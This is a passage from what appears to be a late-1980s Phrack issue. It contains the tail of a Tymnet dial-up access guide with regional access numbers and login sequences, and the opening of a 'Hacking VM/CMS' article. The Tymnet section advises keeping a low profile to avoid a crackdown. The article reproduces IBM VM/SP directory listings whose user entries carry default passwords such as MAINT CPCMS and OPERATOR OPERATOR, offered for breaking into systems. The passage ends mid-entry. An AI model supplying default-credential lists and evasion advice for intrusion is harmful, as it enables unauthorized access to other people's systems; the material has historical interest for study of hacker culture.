@PPS 03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363 @PPS 03306 OAKLAND CALIFORNIA 300/1200 415-893-9889 @PPS 03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666 @PPS 06272 PASADENA CALIFORNIA 300/1200 818-356-0780 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280 @PPS 03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888 @PPS 06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844 @PPS 06272 VAN NUYS CALIFORNIA 300/1200 818-780-1066 @PPS @PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS) (CONNECT MESSAGE) . _. _. _< _C _R _ (SYNCHRONIZES DATA SPEEDS)> (DOES NOT ECHO TO THE TERMINAL) ONLINE 1200 WELCOME TO PPS: 415-XXX-XXXX 1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS) (DOES NOT ECHO UNTIL TYMNET RESPONDS) -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) SOUTHWESTERN BELL NODE CITY STATE DENSITY ACCESS NUMBERS NWRK ----- -------------------- -------------- ------- ------------ ----- 05443 KANSAS CITY KANSAS 300/1200 316/225-9951 @MRLK 05443 HAYS KANSAS 300/1200 913/625-8100 @MRLK 05443 HUTCHINSON KANSAS 300/1200 316/669-1052 @MRLK 05443 LAWRENCE KANSAS 300/1200 913/841-5580 @MRLK 05443 MANHATTAN KANSAS 300/1200 913/539-9291 @MRLK 05443 PARSONS KANSAS 300/1200 316/421-0620 @MRLK 05443 SALINA KANSAS 300/1200 913/825-4547 @MRLK 05443 TOPEKA KANSAS 300/1200 913/235-1909 @MRLK 05443 WICHITA KANSAS 300/1200 316/269-1996 @MRLK 04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK 04766 ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK 06510 ADA OKLAHOMA 300/1200 405/436-0252 @MRLK 06510 ALTUS OKLAHOMA 300/1200 405/477-0321 @MRLK 06510 ALVA OKLAHOMA 300/1200 405/327-1441 @MRLK 06510 ARDMORE OKLAHOMA 300/1200 405/223-8086 @MRLK 03167 BARTLESVILLE OKLAHOMA 300/1200 918/336-6901 @MRLK 06510 CLINTON OKLAHOMA 300/1200 405/323-8102 @MRLK 06510 DURANT OKLAHOMA 300/1200 405/924-2680 @MRLK 06510 ENID OKLAHOMA 300/1200 405/242-8221 @MRLK 06510 LAWTON OKLAHOMA 300/1200 405/248-8772 @MRLK 03167 MCALESTER OKLAHOMA 300/1200 918/426-0900 @MRLK 03167 MIAMI OKLAHOMA 300/1200 918/540-1551 @MRLK 03167 MUSKOGEE OKLAHOMA 300/1200 918/683-1114 @MRLK 06510 OKLAHOMA CITY OKLAHOMA 300/1200 405/236-0660 @MRLK 06510 PONCA CITY OKLAHOMA 300/1200 405/762-9926 @MRLK 03167 SALLISAW OKLAHOMA 300/1200 918/775-7713 @MRLK 06510 SHAWNEE OKLAHOMA 300/1200 405/273-0053 @MRLK 06510 STILLWATER OKLAHOMA 300/1200 405/377-5500 @MRLK 03167 TULSA OKLAHOMA 300/1200 918/583-6606 @MRLK 06510 WOODWARD OKLAHOMA 300/1200 405/256-9947 @MRLK @MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R) (CONNECT MESSAGE) (PLEASE TYPE YOUR TERMINAL IDENTIFIER) A _ (YOUR TERMINAL IDENTIFIER) WELCOME TO MICROLINK II -XXXX:01-030- PLEASE LOG IN: .T < _C _R _> _ (USERNAME TO ACCESS TYMNET) HOST: CALL CONNECTED -GWY 0XXXX- TYMNET: PLEASE LOG IN: SOUTHERN NEW ENGLAND NODE CITY STATE DENSITY ACCESS NUMBERS NWRK ----- ------------------- ----------- ------- -------------- ----- 02727 BRIDGEPORT CONNECTICUT 300/2400 203/366-6972 @CONNNET 02727 BRISTOL CONNECTICUT 300/2400 203/589-5100 @CONNNET 02727 CANAAN CONNECTICUT 300/2400 203/824-5103 @CONNNET 02727 CLINTON CONNECTICUT 300/2400 203/669-4243 @CONNNET 02727 DANBURY CONNECTICUT 300/2400 203/743-2906 @CONNNET 02727 DANIELSON CONNECTICUT 300/2400 203/779-1880 @CONNNET 02727 HARTFORD/MIDDLETOWN CONNECTICUT 300/2400 203/724-6219 @CONNNET 02727 MERIDEN CONNECTICUT 300/2400 203/237-3460 @CONNNET 02727 NEW HAVEN CONNECTICUT 300/2400 203/776-1142 @CONNNET 02727 NEW LONDON CONNECTICUT 300/2400 203/443-0884 @CONNNET 02727 NEW MILFORD CONNECTICUT 300/2400 203/355-0764 @CONNNET 02727 NORWALK CONNECTICUT 300/2400 203/866-5305 @CONNNET 02727 OLD GREDDWICH CONNNETICUT 300/2400 203/637-8872 @CONNNET 02727 OLD SAYBROOK CONNECTICUT 300/2400 203/388-0778 @CONNNET 02727 SEYMOUR CONNECTICUT 300/2400 203/881-1455 @CONNNET 02727 STAMFORD CONNECTICUT 300/2400 203/324-9701 @CONNNET 02727 STORRS CONNECTICUT 300/2400 203/429-4243 @CONNNET 02727 TORRINGTON CONNECTICUT 300/2400 203/482-9849 @CONNNET 02727 WATERBURY CONNECTICUT 300/2400 203/597-0064 @CONNNET 02727 WILLIMANTIC CONNECTICUT 300/2400 203/456-4552 @CONNNET 02727 WINDSOR CONNECTICUT 300/2400 203/688-9330 @CONNNET 02727 WINDSOR LCKS/ENFIELD CONNECTICUT 300/2400 203/623-9804 @CONNNET @CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET (CONNECT MESSAGE) H_ H_ <_ C_ R_> (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNNET ._ T_ <_ C_ R_>_ (MUST BE CAPITAL LETTERS) 26-SEP-88 18:33 (DATA) 031069 (ADDRESS CONFIRMATION) COM (CONFIRMATION OF CALL SET-UP) -GWY OXXXX-TYMNET: PLEASE LOG IN: On a side note, the recent book The Cuckoo's Egg provides some interesting information (in the form of a story, however) on a Tymnet hacker. Remember that he was into BIG things, and hence he was cracked down upon. If you keep a low profile, networks should provide a good access method. If you can find a system that is connected to the Internet that you can get on from Tymnet, you are doing well. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #4 of 12 /===================================\ | | | Hacking VM/CMS | | | | | | by Goe | | | \===================================/ This file written by Goe (my nickname). Any comments or criticisms or corrections are welcomed. Anyone with a good knowledge can modify this. The article's topic is the IBM VM/SP running CMS and using DIRMAINT. I do not know if it works in MVS/TSO or VSE. The first table contains the original default IDs & passwords from IBM Corp. The second table contains those default IDs & passwords that IBM customized for its customer. =============================================================================== *************************************************************** * 3380 SYSTEM DIRECTORY * *************************************************************** * * * The addresses 123, 124, and 125 are virtual ad- * * dresses. The address 123 is critical since it is * * used in DMKSYS, the directory, and the service en- * * vironments of the Interactive Productivity Facil- * * ity. Do not change this address. If you still want * * to change it, remember it must be changed in * * DMKSYS, all service environments, the 'DIRECTORY' * * statement below, and in the 'MDISK' statements * * found under the userid 'MAINT'. * * * * NOTE: Remember these are only virtual addresses * * not real addresses, so there is no need to change * * them to match your hardware addresses. More in- * * formation is contained in the system Installation * * Guide. * * * *************************************************************** * DIRECTORY 123 3380 VMSRES * *************************************************************** * 3380 SYSTEM RESERVED AREAS (NOT FOR MINIDISKS) * *************************************************************** * USER $ALLOC$ NOLOG MDISK A01 3380 000 001 VMSRES R MDISK B01 3380 000 001 VMPK01 R MDISK E01 3380 000 001 VMPK04 R MDISK F11 3380 000 001 PROFPK R MDISK F21 3380 000 001 SQLPK R * USER $TEMP$ NOLOG MDISK A09 3380 272 228 VMSRES R MDISK D09 3380 277 258 VMPK01 * USER $TDISK$ NOLOG MDISK A08 3380 585 091 VMSRES R * USER $CPNUC$ NOLOG MDISK A02 3380 001 005 VMSRES R * USER $DIRECT$ NOLOG MDISK A03 3380 500 002 VMSRES R * USER $SAVSYS$ NOLOG MDISK A04 3380 006 011 VMSRES R MDISK B04 3380 012 056 VMPK01 R * USER $SYSERR$ NOLOG MDISK A06 3380 019 002 VMSRES R * USER $SYSCKP$ NOLOG MDISK A05 3380 271 001 VMSRES R * USER $SYSWRM$ NOLOG MDISK A07 3380 017 002 VMSRES R * *************************************************************** * SYSTEM RELATED USERIDS * *************************************************************** * USER AUTOLOG1 NOLOG 512K 1M ABCDEG ACCOUNT 2 SYSTEM IPL CMS PARM AUTOCR CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR MDISK 191 3380 093 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG * USER CMSBATCH NOLOG 1M 2M G ACCOUNT 3 SYSTEM OPTION ACCT IPL CMS PARM AUTOCR CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR MDISK 195 3380 068 002 VMPK01 MR RBATCH WBATCH MBATCH * USER CMSUSER NOLOG 1M 3M G ACCOUNT 101 USER01 IPL CMS CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR MDISK 191 3380 089 003 VMPK01 MR RCMS WCMS MCMS * USER EREP NOLOG 768K 2M FG ACCOUNT EREP IBMCE IPL CMS CONSOLE 01F 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR LINK MAINT 201 192 RR MDISK 191 3380 027 001 VMSRES WR READ WRITE * USER GCS NOLOG 5M 6M G ACCOUNT GCS RECVM OPTION ECMODE DIAG98 IPL GCS PARM AUTOLOG CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 595 595 RR LINK MAINT 59E 59E RR MDISK 191 3380 677 005 VMPK01 MR RGCS WGCS MGCS * USER IVPM1 NOLOG 3M 16M G ACCOUNT ACT4 IVPM1 CONSOLE 009 3210 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 193 193 RR LINK MAINT 194 194 RR LINK MAINT 19D 19D RR MDISK 191 3380 883 001 VMSRES WR READ WRITE * USER IVPM2 NOLOG 3M 4M G ACCOUNT ACT5 IVPM2 CONSOLE 009 3210 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 193 193 RR LINK MAINT 194 194 RR LINK MAINT 19D 19D RR MDISK 191 3380 884 001 VMSRES WR READ WRITE * USER MAINT CPCMS 16M 16M ABCDEFG ACCOUNT 1 SYSPROG OPTION ECMODE DIAG98 IPL 190 CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A MDISK 123 3380 000 885 VMSRES MW RSYSRES WSYSRES MSYSRES MDISK 124 3380 000 885 VMPK01 MW RSYSRES WSYSRES MSYSRES MDISK 127 3380 000 885 VMPK04 MW RSYSRES WSYSRES MSYSRES MDISK 129 3380 000 885 PROFPK MW RSYSRES WSYSRES MSYSRES MDISK 130 3380 000 885 SQLPK MW RSYSRES WSYSRES MSYSRES MDISK 19D 3380 229 048 VMPK01 MW ALL WMAINT MMAINT MDISK 190 3380 502 037 VMSRES MW ALL WMAINT MMAINT MDISK 191 3380 144 010 VMSRES MW RMAINT WMAINT MMAINT MDISK 193 3380 117 027 VMSRES MW RMAINT WMAINT MMAINT MDISK 194 3380 044 027 VMSRES MW RMAINT WMAINT MMAINT MDISK 196 3380 028 016 VMSRES MW RMAINT WMAINT MMAINT MDISK 201 3380 767 023 VMSRES MW RMAINT WMAINT MMAINT MDISK 293 3380 790 027 VMSRES MW RCMSAUX WCMSAUX MCMSAUX MDISK 294 3380 862 021 VMSRES MW RCPAUX WCPAUX MCPAUX MDISK 295 3380 211 014 VMSRES MW RUSRMOD WUSRMOD MUSRMOD MDISK 296 3380 070 019 VMPK01 MW RCPAUX WCPAUX MCPAUX MDISK 319 3380 021 006 VMSRES MW ALL WMAINT MMAINT MDISK 393 3380 353 063 VMPK04 WR RMAINT WMAINT MDISK 394 3380 416 076 VMPK04 WR RMAINT WMAINT MDISK 396 3380 499 034 VMPK04 WR RMAINT WMAINT MDISK 492 3380 664 011 VMPK01 MW RTSFOBJ WTSFOBJ MTSFOBJ MDISK 494 3380 864 011 VMPK01 MW RTSFAUX WTSFAUX MTSFAUX MDISK 496 3380 092 001 VMPK01 MW RIPCX WIPCSX MIPSX MDISK 497 3380 492 007 VMPK04 MW RMAINT WMAINT MDISK 59E 3380 875 010 VMPK01 MW ALL WMAINT MMAINT MDISK 595 3380 682 031 VMPK01 MW RMAINT WMAINT MMAINT MDISK 596 3380 713 021 VMPK01 MW RGCSAUX WGCSAUX MGCSAUX * USER OLTSEP NOLOG 1M 1M FG ACCOUNT OLTSEP IBMCE OPTION REALTIMER ECMODE IPL 5FF CONSOLE 01F 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 19D 19D RR MDISK 5FF 3380 000 885 CEPACK MR READ WRITE * USER OPERATNS NOLOG 1M 2M BCEG ACCOUNT 13 SYSPROG IPL CMS CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR MDISK 191 3380 154 001 VMSRES MR RIPCS WIPCS MIPCS MDISK 193 3380 201 008 VMSRES MR RIPCS WIPCS MIPCS * USER OPERATOR OPERATOR 3M 16M ABCDEFG ACCOUNT 2 OPERATOR CONSOLE 009 3215 T MAINT SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR MDISK 191 3380 209 002 VMSRES MR ROPER WOPER MOPER * USER SYSDUMP1 NOLOG 1M 1M BG ACCOUNT 16 SYSTEM IPL CMS CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR MDISK 123 3380 000 885 VMSRES RR MDISK 124 3380 000 885 VMPK01 RR MDISK 127 3380 000 885 VMPK04 RR MDISK 129 3380 000 885 PROFPK RR MDISK 130 3380 000 885 SQLPK RR * USER TSAFVM NOLOG 4M 8M G ACCOUNT 1 xxxxxx OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER IUCV ALLOW IUCV *CRM IPL CMS PARM AUTOCR CONSOLE 009 3215 A OPERATOR SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR LINK MAINT 492 192 RR LINK MAINT 494 494 RR MDISK 191 3380 675 002 VMPK01 MR DEDICATE 300 4A0 * =============================================================================== *************************************************************** * 3380 SYSTEM DIRECTORY * *************************************************************** * * * The virtual address 123 is critical since it is * * used in DMKSYS, the directory, and the service en- * * vironments of the Interactive Productivity Facil- * * ity. Do not change this address. If you still want * * to change it, remember it must be changed in * * DMKSYS, all service environments, the 'DIRECTORY' * * statement below, and in the 'MDISK' statements * * found under the userid 'MAINT'. * * * * NOTE: Remember these are only virtual addresses * * not real addresses, so there is no need to change * * them to match your hardware addresses. More in- * * formation is contained in the system Installation * * Guide. * * * *************************************************************** * DIRECTORY 123 3380 VMSRES * *************************************************************** * EXPRESS STANDARD PROFILE FOR GENERAL PURPOSE USERIDS * *************************************************************** * PROFILE EXPPROF IPL CMS PARM AUTOCR CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR * *************************************************************** * 3380 SYSTEM RESERVED AREAS (NOT FOR MINIDISKS) * *************************************************************** * USER $ALLOC$ NOLOG MDISK A01 3380 000 001 VMSRES R 03131808 MDISK A02 3380 000 001 VMGCS1 R 03131808 MDISK A05 3380 000 001 VMPK01 R 03131808 MDISK A06 3380 000 001 VMSTGE R 03131808 MDISK A07 3380 000 001 PROFPK R 03131808 MDISK A08 3380 000 001 SQLPK R 03131808 MDISK A09 3380 000 001 VMPK02 R 03131808 MDISK A0A 3380 000 001 EDMD01 R 03131808 * USER $TEMP$ NOLOG MDISK B01 3380 392 100 VMSRES R 03131808 MDISK B02 3380 392 100 VMPK01 R 03131808 * USER $TDISK$ NOLOG MDISK C01 3380 358 033 VMSRES R 03131808 MDISK C02 3380 492 022 VMPK01 R 03131808 * USER $CPNUC$ NOLOG MDISK D01 3380 001 005 VMSRES R 03131808 * USER $DIRECT$ NOLOG MDISK E01 3380 492 002 VMSRES R 03131808 * USER $SAVSYS$ NOLOG MDISK F01 3380 006 011 VMSRES R 03131808 MDISK F02 3380 012 060 VMPK01 R 03131808 * USER $SYSERR$ NOLOG MDISK F03 3380 019 002 VMSRES R 03131808 * USER $SYSCKP$ NOLOG MDISK F04 3380 391 001 VMSRES R 03131808 * USER $SYSWRM$ NOLOG MDISK F05 3380 017 002 VMSRES R 03131808 * *************************************************************** * SYSTEM RELATED USERIDS * *************************************************************** * USER AUTOLOG1 AUTOLOG1 512K 1M ABCDEG INCLUDE EXPPROF ACCOUNT 2 SYSTEM MDISK 191 3380 094 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG 03131808 * USER CMSBATCH CMSBATCH 1M 2M G ACCOUNT 3 SYSTEM OPTION ACCT IPL CMS PARM AUTOCR CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR MDISK 195 3380 095 002 VMPK01 MR RBATCH WBATCH MBATCH 03131808 * USER CMSUSER CMSUSER 1M 3M G INCLUDE EXPPROF ACCOUNT 101 USER01 MDISK 191 3380 091 003 VMPK01 MR RCMS WCMS MCMS 03131808 * USER EREP EREP 768K 2M FG INCLUDE EXPPROF ACCOUNT EREP IBMCE LINK MAINT 201 192 RR MDISK 191 3380 021 001 VMSRES WR READ WRITE 03131808 * USER GCS GCS 5M 6M G ACCOUNT GCS RECVM OPTION ECMODE DIAG98 IPL GCS PARM AUTOLOG CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 595 595 RR LINK MAINT 59E 59E RR MDISK 191 3380 514 005 VMPK01 MR RGCS WGCS MGCS 03131808 * USER IVPM1 IVPM1 3M 16M G ACCOUNT ACT4 IVPM1 CONSOLE 009 3210 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 193 193 RR LINK MAINT 194 194 RR LINK MAINT 19D 19D RR MDISK 191 3380 868 001 VMSRES WR READ WRITE 03131808 * USER IVPM2 IVPM2 3M 4M G ACCOUNT ACT5 IVPM2 CONSOLE 009 3210 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 193 193 RR LINK MAINT 194 194 RR LINK MAINT 19D 19D RR MDISK 191 3380 869 001 VMSRES WR READ WRITE 03131808 * USER MAINT CPCMS 6M 16M ABCDEFG ACCOUNT 1 SYSPROG OPTION ECMODE DIAG98 IPL CMS IUCV *CCS P M 10 IUCV ANY P M 0 CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A * MDISK 123 3380 000 885 VMSRES MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 124 3380 000 885 VMPK01 MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 126 3380 000 885 VMSTGE MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 127 3380 000 885 VMGCS1 MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 129 3380 000 885 PROFPK MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 130 3380 000 885 SQLPK MW RSYSRES WSYSRES MSYSRES 03131808 MDISK 131 3380 000 885 VMPK02 MW RSYSRES WSYSRES MSYSRES 03131808 * * 19D - Help files * 39D - Help files for NLS * 19E - CMS extension disk. Most program products go here * 190 - CMS nucleus and commands * 191 - MAINT work disk and system dependent files * 193 - CMS text / IPCS text / GCS interface texts * 194 - CP text files and Maclibs * 196 - HPO text files and Maclibs * 201 - EREP files * 293 - Aux and update files for CMS service * 294 - Aux and update files for CP service * 295 - CP/CMS EXPRESS/local service * 296 - HPO aux and update files for service * 3A0 - IPF online documentation * 300 - VM/IPF system support, administration and operation dialogs * 301 - IPF VM/VSE feature files * 31A - Customer procedures and products not from VM/EXPRESS * 310 - Maclibs for VM/IPF * 319 - Some optional Program Products * 393 - CMS source * 394 - CP SOURCE * 396 - HPO source * 492 - TSAF * 494 - TSAF * 496 - IPCS service files * 497 - IPCS source files * 59E - GCS System disk extension * 595 - GCS object code * 596 - GCS service files * MDISK 19D 3380 308 025 VMSRES MW ALL WMAINT MMAINT 03131808 MDISK 39D 3380 333 025 VMSRES MW ALL WMAINT MMAINT 03131808 MDISK 19E 3380 245 147 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 190 3380 494 037 VMSRES MW ALL WMAINT MMAINT 03131808 MDISK 191 3380 088 010 VMSRES MW RMAINT WMAINT MMAINT 03131808 MDISK 193 3380 061 027 VMSRES MW RMAINT WMAINT MMAINT 03131808 MDISK 194 3380 022 027 VMSRES MW RMAINT WMAINT MMAINT 03131808 MDISK 196 3380 684 016 VMSRES MW RMAINT WMAINT MMAINT 03131808 MDISK 201 3380 567 023 VMSRES MW RMAINT WMAINT MMAINT 03131808 MDISK 293 3380 590 027 VMSRES MW RCMSAUX WCMSAUX MCMSAUX 03131808 MDISK 294 3380 663 021 VMSRES MW RCPAUX WCPAUX MCPAUX 03131808 MDISK 295 3380 531 014 VMSRES MW RUSRMOD WUSRMOD MUSRMOD 03131808 MDISK 296 3380 072 019 VMPK01 MW RCPAUX WCPAUX MCPAUX 03131808 MDISK 3A0 3380 128 001 VMPK01 MR ALL WMAINT MMAINT 03131808 MDISK 300 3380 097 015 VMPK01 MR ALL WMAINT MMAINT 03131808 *MDISK 301 3380 001 049 EDMD01 MW ALL WMAINT MMAINT 03131808 MDISK 31A 3380 870 003 VMSRES MW ALL WMAINT MMAINT 03131808 MDISK 310 3380 112 016 VMPK01 MR ALL WMAINT MMAINT 03131808 MDISK 319 3380 617 015 VMSRES MW ALL WMAINT MMAINT 03131808 MDISK 393 3380 001 063 VMSTGE WR RMAINT WMAINT 03131808 MDISK 394 3380 064 076 VMSTGE WR RMAINT WMAINT 03131808 MDISK 396 3380 147 034 VMSTGE WR RMAINT WMAINT 03131808 MDISK 492 3380 195 011 VMPK01 MW RTSFOBJ WTSFOBJ MTSFOBJ 03131808 MDISK 494 3380 721 011 VMSRES MW RTSFAUX WTSFAUX MTSFAUX 03131808 MDISK 496 3380 782 001 VMPK01 MW RIPCX WIPCSX MIPSX 03131808 MDISK 497 3380 140 007 VMSTGE MW RMAINT WMAINT 03131808 MDISK 59E 3380 181 010 VMPK01 MW ALL WMAINT MMAINT 03131808 MDISK 595 3380 214 031 VMPK01 MW RMAINT WMAINT MMAINT 03131808 MDISK 596 3380 700 021 VMSRES MW RGCSAUX WGCSAUX MGCSAUX 03131808 * * 29E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Update files * 36E - 5748-RC1 PVM 191 disk * 39E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Source files * 49E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Text files * MDISK 29E 3380 785 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 36E 3380 563 004 VMSRES RR RMAINT WMAINT MMAINT 03131808 MDISK 39E 3380 181 045 VMSTGE WR RMAINT WMAINT 03131808 MDISK 49E 3380 792 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808 * * 348 - EP - ACF/NCP - NETVIEW - ACF/VTAM - ACF/SSP (VMFPARM DISK) * MDISK 348 3380 001 002 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 * * 298 - 5664-280 VTAM 191 * 299 - 5664-280 VTAM Base disk * 29A - 5664-280 VTAM Run disk * 29B - 5664-280 VTAM Merge disk * 29C - 5664-280 VTAM Zap disk * 29D - 5664-280 VTAM Delta disk * MDISK 298 3380 005 009 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 299 3380 200 024 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 29A 3380 156 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 29B 3380 224 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 29C 3380 244 005 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 29D 3380 860 020 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 * * 33F - 5664-289 ACF/SSP Base disk * 340 - 5664-289 ACF/SSP Delta disk * 341 - 5664-289 ACF/SSP Merge disk * 342 - 5664-289 ACF/SSP Zap disk * 343 - 5664-289 ACF/SSP Run disk * MDISK 33F 3380 687 048 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 MDISK 340 3380 830 010 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 MDISK 341 3380 840 020 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 MDISK 342 3380 249 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 343 3380 110 046 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 * * 352 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Base disk * 353 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Delta disk * 354 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Merge disk * 355 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Run disk * 356 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Zap disk * MDISK 352 3380 259 066 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 353 3380 325 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 354 3380 335 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 355 3380 355 088 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 356 3380 443 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 * * 349 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) VMFPARM DISK * 357 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Base disk * 358 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Delta disk * 359 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Merge disk * 35A - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Zap disk * 35B - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Run disk * MDISK 349 3380 003 002 VMGCS1 MR RMAINT WMAINT MMAINT 03131808 MDISK 357 3380 453 066 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 358 3380 519 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 359 3380 529 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 35A 3380 637 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 35B 3380 549 088 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 * * 330 - 5664-204 NETVIEW Base disk * 331 - 5664-204 NETVIEW Delta disk * 332 - 5664-204 NETVIEW Merge disk * 333 - 5664-204 NETVIEW Zap disk * 334 - 5664-204 NETVIEW Run disk * MDISK 330 3380 735 095 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 331 3380 647 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 332 3380 657 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 333 3380 677 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 MDISK 334 3380 014 096 VMGCS1 WR RMAINT WMAINT MMAINT 03131808 * * 29F - 5664-188 RSCSV2 Update files * 39F - 5664-188 RSCSV2 User exits disk * 49F - 5664-188 RSCSV2 Text disk * 59F - 5664-188 RSCSV2 191 disk * MDISK 29F 3380 129 004 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 39F 3380 799 004 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 49F 3380 803 010 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 59F 3380 208 006 VMPK01 MR RMAINT WMAINT MMAINT 03131808 * * 322 - 5664-283 VM/IS * 326 - 5664-283 VM/IS * 34A - 5668-905 Graphical Display and Query Facility (GDQF) * 346 - 5668-AAA Query Management Facility (QMF) * 347 - 5668-AAA Query Management Facility (QMF) * 360 - 5664-329 Contextual File Search (CFSearch/370) * 361 - 5664-370 Display Write/370 * 363 - 5668-890 Font Library Service Facility (FLSF) * MDISK 322 